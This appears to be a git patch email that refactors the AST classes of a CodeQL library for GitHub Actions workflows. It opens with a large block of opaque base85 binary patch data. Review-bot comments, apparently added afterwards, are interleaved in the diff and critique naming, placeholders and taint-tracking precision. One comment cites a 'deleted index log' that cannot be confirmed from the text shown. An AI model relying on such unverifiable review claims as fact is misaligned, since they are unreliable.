zSP_k@!&;(|R`o|un>1AQnfA7Dv?Y1zh_?FV04oMG(lyQABsoTL%@KXuZPL_%6b3t* zdpeu7zV#~il9`AarOxe(S1T7W5%LqZT6QzJukMbqnh#6yQr>cH;uAzJOsoqF=f>qL 
zs)@(VK#{21nBfHr-{uNi+*q&M!j~MPWOG735w#}dKO8n-TKulwW%?@pf4O%8!5+VxHr3n5}Z$C4AqNjycwzg8-t1w#oIp_&f6LR71x5hg_Ba`x?w(>yQHd0!0>U92RK z@&4ue_oLpv{r0nK1?_z(3mlOW0*a;BCf(*tjw>ilxp1vLmoxw#1raxILNQ!p#JNLm zRCv+E)Xnmo?{s#!V&3qm$7L|ugMp5{a-g-_#PN*1Z>!1$w6SWa-t)1R(%~xJscKPN znI2ZiCVY#;2`$AHS1gVz{>0@?tV!)r_M=ro5W-oT3dJPspiWMO?~}W- zGJI)cq5CkgPn)$UDUBUt8@0(cx4GHQSIo|}@+H0;>24x|m5}XTX-%h_UG;G@$uhpC z&)&d-nZ`zXL|WPG0#XNvD=*361Z<&IH!TD?S~XU2c|{8l4&xlGq+P@A{TfSGYQ-(N zzyj`{*)CzD8ex0eSQ~?an=({@Vi}+wYFmB;5W})@>xIK8-G{G~$*>AHxN315lDc@ol493TsaDnxQP=6@>;;w1AF&;{Y}=~s&v>|#{mcPS%7@c&onzWc$3~q!o&&KNXFv6q_W1i zMO7m?q8|$1@idXFt&}=O2X*W&bghQ#eoj$k+J##fSJswO*|6@N*Ou&NWRQ|0>A35U z?isp^`D${Ia`YDDZ-tjKqh9(>vbn7)*2-MG4Kf3E$EMsP)C7u}9pW@;r>3i&I;PVNGU z=#Uuy?{gli2?d~X;L|I*5YPg1Mk_4VRvn%yOc(5&Z?{rfGJuG#%O5tEwj)Q`DyC}j z+K@V}vQR6M7pMgdHLbShsJ>2FoKR+runaFB`|I#7WoOQW5EY{)I)&w_iVQ4I+L#ys zu4vlU7fDyz82y`YPoVo=eY%XzJYvFaXbg&nD>ExfT?+SogGOWviYns8ea1g3LFQoyVRu`noZBR9FG%f z-;d)N!h;+h2(|b3O1B<2R~CJ45`o`Ic{`%I7Jj4LGPfCEzjooSF0WMP`*o}&51)Rz zh(#L>(*zAqw)A>HKMn?ZA9aitTVBdi3lx6!UQ20DCjlxyKw0ER0n%bb5P##V{UplW zefX7v6Ty~Cah!qu`RbKCgv;@U<@=BGxbI!FE|4BKI1iSnYbGcVkYTic^9INKxWN@E zOa5&-mFtRyzAqoS&_R;*GQoRf+0$uAFwohllok0*d<=O355_&dZ& zh>qlF6jK=AM@1PPhD-RTBYkWc6wYdBKG>NCuoE`E^=&>V)`1f#NL=uoR|DztgP@Cx zU`4M0`Ft4f?~7^R<;jOW)S2`-$q>9RMQUMG2!hC(_`(20=1l>^Jt(RuJ4Mb6y(cnt zCQGbOQcp0I-{BZUnzB#hd%Z9XNM@h)4+gD@fh9xaFD4{aP$grlgk$K{W)_u66RDb& zGT`ATc#vyu_sSR`Phr41Dg)K-;a`X=#Sxpl#}0@Or5EWgi*K^Y&UnvPfF3t!;}5|; zh)}MZf=yvGU|M!&IZW@`9U&CLv8td)qRPuEdKko7^W94$xW^SQfVJWh3BE4PfHVD+U?N8Cq{YM{{2~W3aziu+3_V>^N&$nqC{rww!yZN{ z<05`2Mu!F1$*MGsy1A=4j|#^s3y1Tb8a7X%ObxFA^#ffg6atK|(Lp)NlmmP$B~i?= zl6?>?wu~fE5ndHRI!z=S!e~s=*h@{ad}AL1 z1+-Ig9<0$MW8;u66^d8+sp(Cq_b;cQgmo{NLyQn_q;W35-YAoY8=kt|3$Ns>7jfpY zy~YFaW&qh3IEv~k^{fHz<(pJb8S_*5;&{A%Q^sfzb!ToRKyxZmv{`RE_HH2G@)YPa zlQ9bA1s@(53urPLNp?Q2`PR_Do1UtX>XxkOQD4KuTMkeM6;{U=${Vg7UTeclwm-$| zDGCb8sVuPD5ueNG3`1!SjRc#)S`1{1{9Oc9%Z zfa4n3-eH88iU&+0f{vrzP;7#$DP*UsnhLr;}iuB zhh}Lws&I1i$!|c#Iwl;&uq 
zZ)U$W^feemb20e0>V_<9_qzO0@%Wyuwn0=kr;v&{V0jxq2|&3g4Qe3RXzbdq&28yM zOrEFhXl{HA$fO7>QcDmZAg1tt3&?)Ym$Wx9vDLS?wS6$CAA@pi7$c$&1H$|BlooJQ zc^l6eDCjSu?|0#*W2xI_#W$MzE>7o0um%|3&=ybm3Od1=B7!Isw8`aS{g`^wv{fjJ zI6M54n=U$XDrj`0$m6vGeL6>IYgKcWs=dSsNtGSXOS3BEoogq0!NkUft6$EXoFUJE z<-^zi_VD`eu146ufgtS%m;ceE`$g0sBiw_R3OO{JJ0#O(K-3gZRZ3CSx;?DDrINF@7<2m~ZCwrUQ`>UF=G;wyFwWzA zxCKgt=kS-GMoCgY68Au$>0dqJkI$z(6AN7zH)f1agefd`)%L=Tbs$y31zP4JG4^Is{)Zth?gZIlDo) zhYX01FKwz7S=i4eG_w7{5OqX7{tKemuoXSdL6wxbmN&=Nb_QU^y9W)*k4qm#9W?UtL9xaUo63KWm%h)a z+K2Ke8(LGK-lJ6g9lTigV9Ib^yg~(Tyup8^JACebBnu^hToQiyL z%?|8{U4~d&Wqb5p`N6d*IsaDY;gq0j*l)Bm!uQ5Zayf)69xmNhx+@NNBbNBGVXc? zj^;fU7T&GE=$EUSf`Zk)4w@>=;E6yVSzO4=((>uC<*#eeUeZP3ku&CiK9})|@TAWj z+N>XOUec)CEm3oh9JgkQ_#7PE6Wd8fed?2K7~a*q(+yE6|7nuqeseULGO$+;Vi@UJ zYcJmrNcYO>%r24fv(vA1rLFpl2F{1M{`S}U3GZi|>&I%9huR|DhoBVE4EHe8{`+s= zBl@JBfPP4nts8P+Cy=BG{o$Bi>NDJ$!U2(~eMjzrfN7ZNn~m;2M(sH)JaPR+!RjX) zwozIX^EW*md6iaXS6{b57P3-W)qGbwayWJgStR*;t8XHy+K47W2$iPbG*l7c&YdfA z3)ybk6x~>iZ#R+0T7EKN*7BBV+6IJFPwe}D@V?|!TsK(fJY>v4>~4RxwX(e^l3WRV zTtJlud7e2Bl%4%G?0Y>QsTR6+HYQHLR*$?SaFhYLVO<#k(!}H?G&OQwBz5H$s24Tz zl8R#Nn?!RBd@iRB`00=L1LO`4KMC_}M7WRV`s&|=kMJm2SuNt-xWleT@@SY=2fO$| zzhBf;1VMzDa~svLb;PZi{$K*ZKw}TzWwy z4Jjn^+o?D%s6AhQo=bo8jc6z`L4G7^{IIox5=fhTk1!#rd<&=nW_@iVv>tvQ`HIGu zzDc>>A^TTyr8OpD@4Y)agLoO&nJ51 z+4kfPIcADdtw8g?5S0f=5KzgL}7(lricQa081UfrV5v{D1_vcgyT ztlGY74KJ~+y7^q&{loRul`|Hi@TGJ$=l)4%>s9Uo;Ho)Vmx!&sv3J^nZgF6IU#=+r z;3p2-R1#MW+YHIdd_Y4rL=lqB&q~{lqMjMqzTySlT;tKmS845GS$B|+^0FbvMJ{=e zRyg?I;Ezrdi7OL15>vDGbo0im;{Gto7^jUhywHgk^y0j3Rv%(|k$HwH(=?!f?iZ z5DP`zJdT^tqC!&0mtu%RtF=zM%yE59rX&ZnaDOn%)@~PfpojqP_C*Hr*$hL! 
zf_{l3PPFBHp9m2yEQ0uT|5E+X=8E!YkW|_-UT5~asAYcOs-S9yvA;~Pa*7(x9VSh& zBJuM(n8RP0G6q#3`(s65+F!%K^Uu>SGsrDc8u(C-*1ms>E{%qo%a^lTw&z{Z%3_jh z;)pI65A`Fvmx!I=`?Umojvj6#ZnwjY`(S143k)Z>K_;UR1mkE%aq0OW0q*vu9`P@x zaBdJVEOOH{)87>1FTo4>~^T9N2CwSG}{R#k>gs* zZt{+xHZ^KZ;mIo!w=Q+%Yy>&u9B)Sk#dxn65~U_ZHVBoIb|nOkuDr3iQO0N0{kkP$ zd()b%7)r?fXFJiYwCPN^3`amu-5OyCbOR`B*@uDS5AL5C+v5a|*7I5AB4LKj>a@7; zxIXamc~Rl1hz_3H-I%F-{TfzoWKAal%)K0{Co}15V62!$gw=BKN@pCtEQX%avtd7( zPEFmz`C2N;*yr$ryyfu1`$rfjs9a@hYqr^ZuhroJgNp*EI8M6uVRn|(AS`jdrKUp(Q+mAbUuhW_9AC9EZF!laE#03u= zO8%AQ$E(*fRn-3nmY?43bE29NeTWhG_T3=^UZyR8-{63&K*P&GwF4OMu7?uMJ0+zh zN4`&F)B15Q0nKk&E%CI>1fjZ2GEg0M;Ynz2~|}MGtf;{gv>4i>&P) z8X5qh9wE{%zSYwrb($PK{WOZ+^yG&x)Q6A1@RiT>sFH= z$xhNzRs66*3qMeK2lGJtns7EDk}}#kouJgEH{|Tq26;%`+_kG+xVRVD8gpWVwwI_H zNo21%he3?9B~R9R)QKg#=}8|pk_v-Ui~!X(%2zMO==g8p=6(sCjd^dV{(<+_zw++! zoI{<=C=z{~3mE)p!FL?gEY$t(rvpe&7h)!mx1gZ*LI@1dNS8f+abuVwG@qfH zD7eKt?>I}_wQ#2W_C4pDjfD@5g6WJ!v|5Zo1Vh!@FWRx&gbdDjTFUTawrQaO!U}{{ z(~Af(^p|y!mL1X#DHvn-x0MApyeS_#NmT_@5ehFgkK?-%@kFN9CEw`|$-dW8S;f zb;sDe7c^&i^n`%v>wAm{n>hhXQVNisA5HCfIY3`7gKvRst3t~}OlGaYJ?8EN*8#dl zKZXDo%CCtY7bjtetA@^l7C!&=Uh|Bx?y;Zl*QGg1R@#RF-EaO9&?$oGEOr_6?4ey$`@cBe$f|}|B_{m;`;)HijX~TY>eM{-( z4H9P1lei%aE3`kwMnzvl8YT*W`=sjK5i@c@jnL|@fA)qd#H}D5%n>JS2&+uwr-O~I z+qD8ko4W~SaWIV8K~ZtOz2{3N9CDFm#kOPaSpINu!a}w4Fjg-rF17! 
z2hd6Zg*yTg>l0sj2k9z|lz&L*8kt4v#BC-oyV4ZY6m5u;9sD%8k;_KCbsmG!5P%SC zw1f{`W3Tl{LRp&S<|aaD8Rp?9yz@iQsrRpWPpD#`xecPMg8dR-Bibi2x0f!obHSy& zu6@_0Hi;hVW3S)#C<^`^QL~+VI#&PLiC{|Vv^is&3Un*Pm;qHxB?hM)K6X{6wCxoaQ|a00Q>NfZ%n ziaVY%V|9Ylph}d{fa}Iw>HMOYTKVs3;InlaY{Y6iVAZJ|(!MQmPQDypVZ;P5p zPEvEQ8#V&_7rIcZ3gP zlxEQ$$wmilihi`uO8>fVI{t5w{XgxljP(EW{>;VmlnvKOmcF~<8>(@c(?i~}=&YK2hlx?BogE!JdKv7~h@LltpiRd;HO|5Ld7~<) zilBFJufH322!9G~Zdp-k2HMyF#>V5s>uZBYEjD<7L4N4hXu*0>gDnID*^npjJ~g{s zec9qT&>!?h7jLEt!tu4N@ISl$GJqU{?tsw`tn5F${(CC@f0;L?C%joiYMMUq);Vtr z*9_;ZYU|03R0WQ3wbLO+x~7syTkZR!PTHonw3!&W_7R_`eFW5|bdRgZi5a-_RWXOD~)jB}=w5^IxW1-*W% z#HDP3!B%Jr!ESG}D&s^dA9u@$C4tEkCM>Kj-Y=s1=-Lb+FSoyJj0B2u3w^R4$pWlO zcpECmX)K0kH1I5BOaPIp@g&G?IUJp2)pOI@?~KmyX7-^3Lz2xU=`n!Wo(@|-6c%ZR z_8XYt4*5DsS-`zQOh5Zm=mVcd3K*7*Kem8DEZOwgb-2Ufyrc394YU7p>|0nRL zZK{u*!@mdn!`gl(;Qvn_@t>%lwt4;&_3A_Te=gKdTRR_v(4VNEwo^W~RsJ68kpB+U zPa9JIME|ss-Rn2>ho}69^1tWe{QqwN{S)rfy2O9N-9dR?xW6tCf5LrQwewH7{n*b7 z_gCrUpKzbn&^(qB{T^C`&j$COg++ftep=){0aAI!N6lN%kObX@@#PbTWQOm;Ga6+k2MXy$5-;_1OK$b;ZMX*?d8Yp$nTL% z@qCDX`}BX}ed<^KQ_Tmjo(=DB3;a*GPi?zLbME($rhYcKPc79y0Y9~z{t5W}^>YLM zk9*%!_vXLH-2$G{gPRNFB`lY+#>Q41eN%nt}Z%UM$vU#`_-w$Gu|2Nt9C&;IX knty`4;`(0&`82a8BM$j+O$GtMefVKQ1p%q%dHn7F1A{ntPyhe` From e5527d7a181a0c37cd6fa3d8fd885f3ee1e3092b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 5 Mar 2024 19:59:43 +0100 Subject: [PATCH 086/707] Refactor ast nodes --- ql/lib/codeql/actions/Ast.qll | 281 ++++++++++++++++++++++------------ 1 file changed, 184 insertions(+), 97 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 89afd954d85c..1d86d81a063e 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -1,19 +1,51 @@
 private import codeql.actions.ast.internal.Yaml
 private import codeql.Locations
+newtype TAstNode =
+ TWorflowNode(YamlNode n) or
+ TExpressionNode()
+
+class AstNode extends TAstNode {
+ abstract AstNode getAChildNode();
+
+ abstract AstNode getParentNode();
+
+ abstract string getAPrimaryQlClass();
+
+ abstract Location getLocation();
+
+ abstract string toString();
+}
+
+class ExpressionNode extends AstNode, TExpressionNode {
+ override string toString() { result = "expression node" }
+
+ override AstNode getAChildNode() { none() }
+
+ override AstNode getParentNode() { none() }
+
+ override string getAPrimaryQlClass() { result = "ExpressionNode" }
+
+ override Location getLocation() { none() }
+}
+
 /**
  * Base class for the AST tree. Based on YamlNode from the Yaml library.
  */
-class AstNode instanceof YamlNode {
- AstNode getParentNode() { result = super.getParentNode() }
+class WorkflowNode extends AstNode, TWorflowNode {
+ YamlNode n;
+
+ WorkflowNode() { this = TWorflowNode(n) }
- AstNode getAChildNode() { result = super.getAChildNode() }
+ override AstNode getParentNode() { result = TWorflowNode(n.getParentNode()) }
- string toString() { result = super.toString() }
+ override AstNode getAChildNode() { result = TWorflowNode(n.getAChildNode()) }
- string getAPrimaryQlClass() { result = super.getAPrimaryQlClass() }
+ override string getAPrimaryQlClass() { result = n.getAPrimaryQlClass() }
- Location getLocation() { result = super.getLocation() }
+ override Location getLocation() { result = n.getLocation() }
+
+ override string toString() { result = n.toString() }
 /**
  * Gets the enclosing workflow statement.
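Review bot: `TWorflowNode`, in the `newtype TAstNode` branch and in every `WorkflowNode` predicate that constructs it, is missing the `k` of `Workflow`, and because it becomes part of the library's public type vocabulary it will only get more expensive to rename; `TWorkflowNode(YamlNode n) or` is the fix. The nullary `TExpressionNode()` branch is a single placeholder value whose `getLocation()`, `getParentNode()` and `getAChildNode()` are all `none()`, so any query that selects it, or any flow path that passes through it, has no location to report; a comment such as `// Placeholder: a located expression node is introduced in a follow-up` on the branch would make that intent explicit. `class AstNode` declares only abstract members but is not itself marked `abstract`; I am not certain the QL compiler rejects that, but `abstract class AstNode extends TAstNode` states the design and should be verified.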
@@ -24,7 +56,9 @@ class AstNode instanceof YamlNode { * Gets a environment variable expression by name in the scope of the current node. */ StringLiteral getEnvVar(string name) { - exists(Env env | env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) | + exists(Env env | + env.asYamlMapping().maps(any(YamlScalar s | s.getValue() = name), result.asYamlNode()) + | env.(StepEnv).getStep().getAChildNode*() = this or env.(JobEnv).getJob().getAChildNode*() = this @@ -32,16 +66,23 @@ class AstNode instanceof YamlNode { env.(WorkflowEnv).getWorkflow().getAChildNode*() = this ) } + + YamlNode asYamlNode() { result = n } + + YamlMapping asYamlMapping() { result = n } } /** A common class for `env` in workflow, job or step. */ -abstract class Env extends AstNode instanceof YamlMapping { } +abstract class Env extends WorkflowNode { } /** A workflow level `env` mapping. */ class WorkflowEnv extends Env { Workflow workflow; - WorkflowEnv() { workflow.(YamlMapping).lookup("env") = this } + WorkflowEnv() { + n instanceof YamlMapping and + workflow.asYamlMapping().lookup("env") = this.asYamlNode() + } /** Gets the workflow this field belongs to. */ Workflow getWorkflow() { result = workflow } @@ -51,7 +92,7 @@ class WorkflowEnv extends Env { class JobEnv extends Env { Job job; - JobEnv() { job.(YamlMapping).lookup("env") = this } + JobEnv() { job.asYamlMapping().lookup("env") = this.asYamlNode() } /** Gets the job this field belongs to. */ Job getJob() { result = job } @@ -61,7 +102,7 @@ class JobEnv extends Env { class StepEnv extends Env { Step step; - StepEnv() { step.(YamlMapping).lookup("env") = this } + StepEnv() { step.asYamlMapping().lookup("env") = this.asYamlNode() } /** Gets the step this field belongs to. */ Step getStep() { result = step } 
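Review bot: `getEnvVar(name)` pairs `name` with every `Env` that encloses this node — step, job and workflow level alike — so a variable defined at two levels resolves to both `StringLiteral`s with no shadowing precedence, although at runtime the step-level `env` wins. For taint tracking that is a deliberate over-approximation, but it also means a step that overrides a tainted workflow-level `FOO` with a constant still yields a flow path from the workflow value, so it should be stated: `// No shadowing precedence: a name defined at several levels resolves to all of them (over-approximation).` above the `exists`. The doc comment should also read `Gets an environment variable expression by name in the scope of the current node.`. The predicate body starts in this hunk and continues into the next one.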
@@ -71,27 +112,32 @@ class StepEnv extends Env { * A custom composite action. This is a mapping at the top level of an Actions YAML action file. * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions. */ -class CompositeAction extends AstNode instanceof YamlDocument, YamlMapping { - //class CompositeAction extends AstNode, YamlDocument, YamlMapping { +class CompositeAction extends WorkflowNode { + //class CompositeAction extends WorkflowNode, YamlDocument, YamlMapping { CompositeAction() { - this.getFile().getBaseName() = ["action.yml", "action.yaml"] and - super.lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = "composite" + n instanceof YamlDocument and + n instanceof YamlMapping and + this.getLocation().getFile().getBaseName() = ["action.yml", "action.yaml"] and + this.asYamlMapping().lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = + "composite" } /** Gets the `runs` mapping. */ - Runs getRuns() { result = super.lookup("runs") } + Runs getRuns() { result.asYamlNode() = this.asYamlMapping().lookup("runs") } - Outputs getOutputs() { result = super.lookup("outputs") } + Outputs getOutputs() { result.asYamlNode() = this.asYamlMapping().lookup("outputs") } StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } - Input getAnInput() { super.lookup("inputs").(YamlMapping).maps(result, _) } + Input getAnInput() { + this.asYamlMapping().lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) + } Input getInput(string name) { - super.lookup("inputs").(YamlMapping).maps(result, _) and - result.(YamlString).getValue() = name + this.asYamlMapping().lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) and + result.asYamlNode().(YamlString).getValue() = name } } 
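Review bot: The commented-out header `//class CompositeAction extends WorkflowNode, YamlDocument, YamlMapping {` is dead code that was nevertheless updated by this commit, which suggests it is being kept on purpose; if so, say why in the comment, otherwise delete the line. `getInput(name)` and `getAnInput()` repeat the same `this.asYamlMapping().lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _)` lookup, and `Input getInput(string name) { result = this.getAnInput() and result.asYamlNode().(YamlString).getValue() = name }` keeps the two from drifting apart.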
@@ -99,34 +145,43 @@ class CompositeAction extends AstNode instanceof YamlDocument, YamlMapping { * An `runs` mapping in a custom composite action YAML. * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions#runs */ -class Runs extends AstNode instanceof YamlMapping { +class Runs extends WorkflowNode { CompositeAction action; - Runs() { action.(YamlMapping).lookup("runs") = this } + Runs() { + n instanceof YamlMapping and + action.asYamlMapping().lookup("runs") = this.asYamlNode() + } /** Gets the action that this `runs` mapping is in. */ CompositeAction getAction() { result = action } /** Gets any steps that are defined within this job. */ - Step getAStep() { result = super.lookup("steps").(YamlSequence).getElementNode(_) } + Step getAStep() { + result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(_) + } /** Gets the step at the given index within this job. */ - Step getStep(int i) { result = super.lookup("steps").(YamlSequence).getElementNode(i) } + Step getStep(int i) { + result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(i) + } } /** * An Actions workflow. This is a mapping at the top level of an Actions YAML workflow file. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. */ -class Workflow extends AstNode instanceof YamlDocument, YamlMapping { +class Workflow extends WorkflowNode { + Workflow() { n instanceof YamlDocument and n instanceof YamlMapping } + /** Gets the `jobs` mapping from job IDs to job definitions in this workflow. */ - YamlMapping getJobs() { result = super.lookup("jobs") } + YamlMapping getJobs() { result = this.asYamlMapping().lookup("jobs") } /** Gets the 'global' `env` mapping in this workflow. */ - WorkflowEnv getEnv() { result = super.lookup("env") } + WorkflowEnv getEnv() { result.asYamlNode() = this.asYamlMapping().lookup("env") } /** Gets the name of the workflow. 
*/ - string getName() { result = super.lookup("name").(YamlString).getValue() } + string getName() { result = this.asYamlMapping().lookup("name").(YamlString).getValue() } /** Gets the job within this workflow with the given job ID. */ Job getJob(string jobId) { result.getWorkflow() = this and result.getId() = jobId } 
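Review bot: `Workflow() { n instanceof YamlDocument and n instanceof YamlMapping }` admits every top-level YAML mapping that was extracted, not only workflow files, so each `action.yml` that `CompositeAction` claims in the previous hunk is also a `Workflow` — the deleted index log earlier on this page shows `action1/action.yml` being indexed next to the workflows. Every predicate that quantifies over `Workflow` (for example `MatrixExpression.getTarget` later in this diff) then considers composite-action files too; unless that overlap is intended, a positive check such as `this.asYamlMapping().lookup("jobs") instanceof YamlMapping` in the characteristic predicate, or a path test for `.github/workflows/`, separates the two. This hunk starts on the previous line.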
@@ -135,107 +190,128 @@ class Workflow extends AstNode instanceof YamlDocument, YamlMapping { Job getAJob() { result = this.getJob(_) } predicate hasTriggerEvent(string trigger) { - exists(YamlNode n | n = super.lookup("on").(YamlMappingLikeNode).getNode(trigger)) + exists(YamlNode y | + y = this.asYamlMapping().lookup("on").(YamlMappingLikeNode).getNode(trigger) + ) } string getATriggerEvent() { - exists(YamlNode n | n = super.lookup("on").(YamlMappingLikeNode).getNode(result)) + exists(YamlNode y | y = this.asYamlMapping().lookup("on").(YamlMappingLikeNode).getNode(result)) } - Permissions getPermissions() { result = super.lookup("permissions") } + Permissions getPermissions() { result.asYamlNode() = this.asYamlMapping().lookup("permissions") } - Strategy getStrategy() { result = super.lookup("strategy") } + Strategy getStrategy() { result.asYamlNode() = this.asYamlMapping().lookup("strategy") } } -class ReusableWorkflow extends Workflow instanceof YamlMapping { +class ReusableWorkflow extends Workflow { YamlValue workflow_call; ReusableWorkflow() { - super.lookup("on").(YamlMappingLikeNode).getNode("workflow_call") = workflow_call + n instanceof YamlMapping and + this.asYamlMapping().lookup("on").(YamlMappingLikeNode).getNode("workflow_call") = workflow_call } - Outputs getOutputs() { result = workflow_call.(YamlMapping).lookup("outputs") } + Outputs getOutputs() { result.asYamlNode() = workflow_call.(YamlMapping).lookup("outputs") } StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } - Input getAnInput() { workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) } + Input getAnInput() { + workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) + } Input getInput(string name) { - workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) and - result.(YamlString).getValue() = name + 
workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) and + result.asYamlNode().(YamlString).getValue() = name } } -class Input extends AstNode { +class Input extends WorkflowNode { YamlMapping parent; - Input() { parent.lookup("inputs").(YamlMapping).maps(this, _) } + Input() { parent.lookup("inputs").(YamlMapping).maps(this.asYamlNode(), _) } } -class Outputs extends AstNode instanceof YamlMapping { +class Outputs extends WorkflowNode { YamlMapping parent; - Outputs() { parent.lookup("outputs") = this } + Outputs() { + n instanceof YamlMapping and + parent.lookup("outputs") = this.asYamlNode() + } /** * Gets an output expression. */ StringLiteral getAnOutput() { - super.lookup(_).(YamlMapping).lookup("value") = result or - super.lookup(_) = result + this.asYamlMapping().lookup(_).(YamlMapping).lookup("value") = result.asYamlNode() or + this.asYamlMapping().lookup(_) = result.asYamlNode() } /** * Gets a specific output expression by name. */ StringLiteral getOutput(string name) { - super.lookup(name).(YamlMapping).lookup("value") = result or - super.lookup(name) = result + this.asYamlMapping().lookup(name).(YamlMapping).lookup("value") = result.asYamlNode() or + this.asYamlMapping().lookup(name) = result.asYamlNode() } - string getAnOutputName() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = result), _) } + string getAnOutputName() { + this.asYamlMapping().maps(any(YamlString s | s.getValue() = result), _) + } override string toString() { result = "Job outputs node" } } -class Permissions extends AstNode instanceof YamlMapping { +class Permissions extends WorkflowNode { YamlMapping parent; - Permissions() { parent.lookup("permissions") = this } + Permissions() { + n instanceof YamlMapping and + parent.lookup("permissions") = this.asYamlNode() + } } -class Strategy extends AstNode instanceof YamlMapping { +class Strategy extends WorkflowNode { YamlMapping parent; - Strategy() { parent.lookup("strategy") = this } + 
Strategy() { + n instanceof YamlMapping and + parent.lookup("strategy") = this.asYamlNode() + } /** * Gets a specific matric expression (YamlMapping) by name. */ StringLiteral getMatrixVar(string name) { - super.lookup("matrix").(YamlMapping).lookup(name) = result + this.asYamlMapping().lookup("matrix").(YamlMapping).lookup(name) = result.asYamlNode() } /** * Gets a specific matric expression (YamlMapping) by name. */ - StringLiteral getAMatrixVar() { super.lookup("matrix").(YamlMapping).lookup(_) = result } + StringLiteral getAMatrixVar() { + this.asYamlMapping().lookup("matrix").(YamlMapping).lookup(_) = result.asYamlNode() + } } /** * https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idneeds */ -class Needs extends AstNode instanceof YamlMappingLikeNode { +class Needs extends WorkflowNode { Job job; - Needs() { job.(YamlMapping).lookup("needs") = this } + Needs() { + n instanceof YamlMappingLikeNode and + job.asYamlMapping().lookup("needs") = this.asYamlNode() + } Job getJob() { result = job } Job getANeededJob() { - result.getId() = super.getNode(_).(YamlString).getValue() and + result.getId() = this.asYamlNode().(YamlMappingLikeNode).getNode(_).(YamlString).getValue() and result.getLocation().getFile() = job.getLocation().getFile() // if this instanceof YamlString // then @@ -254,11 +330,14 @@ class Needs extends AstNode instanceof YamlMappingLikeNode { * An Actions job within a workflow. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. */ -class Job extends AstNode instanceof YamlMapping { +class Job extends WorkflowNode { string jobId; Workflow workflow; - Job() { this = workflow.getJobs().lookup(jobId) } + Job() { + n instanceof YamlMapping and + this.asYamlNode() = workflow.getJobs().lookup(jobId) + } /** * Gets the ID of this job, as a string. 
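Review bot: `Strategy.getMatrixVar(name)` only has a result when the value under `matrix.<name>` is itself a scalar (a `StringLiteral`), so the usual list form `os: [ubuntu-latest, windows-latest]`, entries inside `include:`/`exclude:`, and a whole-matrix expression `matrix: ${{ fromJSON(needs.x.outputs.m) }}` all resolve to nothing — and the last shape is exactly the one through which attacker-influenced job outputs reach `matrix.*` references. If scalar-only resolution is intentional for now, the two doc comments (which also misspell `matric` and describe the result as a `YamlMapping` while the return type is `StringLiteral`) should say so, e.g. `Gets the inline scalar value of matrix variable `name`; list, include/exclude and fromJSON-driven matrices are not resolved.` The `n instanceof YamlMapping` in `ReusableWorkflow()` is redundant with the `Workflow` constructor it extends. This hunk starts two lines earlier.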
@@ -267,10 +346,14 @@ class Job extends AstNode instanceof YamlMapping { string getId() { result = jobId } /** Gets any steps that are defined within this job. */ - Step getAStep() { result = super.lookup("steps").(YamlSequence).getElementNode(_) } + Step getAStep() { + result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(_) + } /** Gets the step at the given index within this job. */ - Step getStep(int i) { result = super.lookup("steps").(YamlSequence).getElementNode(i) } + Step getStep(int i) { + result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(i) + } /** Gets the workflow this job belongs to. */ Workflow getWorkflow() { result = workflow } @@ -293,7 +376,7 @@ class Job extends AstNode instanceof YamlMapping { * out1: ${steps.foo.bar} * out2: ${steps.foo.baz} */ - Outputs getOutputs() { result = super.lookup("outputs") } + Outputs getOutputs() { result.asYamlNode() = this.asYamlMapping().lookup("outputs") } StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } @@ -310,14 +393,14 @@ class Job extends AstNode instanceof YamlMapping { UsesJob getUses() { result.getJob() = this } predicate usesReusableWorkflow() { - this.(YamlMapping).maps(any(YamlString s | s.getValue() = "uses"), _) + this.asYamlMapping().maps(any(YamlString s | s.getValue() = "uses"), _) } - If getIf() { result = super.lookup("if") } + If getIf() { result.asYamlNode() = this.asYamlMapping().lookup("if") } - Permissions getPermissions() { result = super.lookup("permissions") } + Permissions getPermissions() { result.asYamlNode() = this.asYamlMapping().lookup("permissions") } - Strategy getStrategy() { result = super.lookup("strategy") } + Strategy getStrategy() { result.asYamlNode() = this.asYamlMapping().lookup("strategy") } override string toString() { result = "Job: " + jobId } } 
@@ -326,41 +409,41 @@ class Job extends AstNode instanceof YamlMapping {
  * A step within an Actions job.
  * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idsteps.
  */
-class Step extends AstNode instanceof YamlMapping {
+class Step extends WorkflowNode {
 YamlMapping parent;
- Step() { parent.lookup("steps").(YamlSequence).getElementNode(_) = this }
+ Step() { parent.lookup("steps").(YamlSequence).getElementNode(_) = this.asYamlNode() }
 /** Gets the ID of this step, if any. */
- string getId() { result = super.lookup("id").(YamlString).getValue() }
+ string getId() { result = this.asYamlMapping().lookup("id").(YamlString).getValue() }
